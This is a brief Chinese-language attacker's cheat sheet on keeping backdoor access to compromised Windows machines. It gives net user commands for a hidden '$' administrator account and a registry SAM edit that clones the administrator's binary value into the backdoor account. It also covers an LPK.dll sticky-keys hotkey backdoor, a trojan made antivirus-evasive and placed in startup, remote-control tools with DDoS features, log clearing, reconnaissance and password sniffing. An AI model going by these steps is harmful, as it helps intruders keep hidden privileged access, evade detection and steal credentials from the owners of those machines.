windows安裝後門:
賬號後門:
net user
net user 賬號$ 密碼 /add 加$符變為隱藏賬號
net localgrop administrators 賬號 /add
net user 賬號 /del 刪除賬號

系統自帶賬號改密碼  記錄名字
regedit   打開註冊表
HKEY_LOCAL_MACHINE->SAM->SAM
右鍵設置權限   刷新   users->name  找到賬號  看類型   上面找到該賬號
先找到管理員(administrator)賬號  雙擊類型為REG_BINATY第一個  所有數據復制
粘貼進後門賬號
關閉sam文件夾權限
 

LPK後門：
生成lpk.dll
鍵值為ascii碼，2鍵同時按下2個鍵，3鍵同時按下三個鍵 生成
exe可執行程序觸發
五次shift，同時按下設置的熱鍵，彈出密碼框，輸入密碼登錄
×××後門：
遠控上線+×××免殺，×××丟進開機啟動項
部分帶壓力測試遠控可進行DDOS×××
windows清理痕跡可下載清理工具
允許外連:
***工具:navicat premium essentials
不允許外連：
***腳本

信息搜集:
nmap
zenmap
scanport
ntscan
arp -a
net view 查看其它電腦主機名
查看ip:
ipconfig

getpass

流量監聽:
wiresharke
cain
sniffer pass

windows留後門與局域網抓包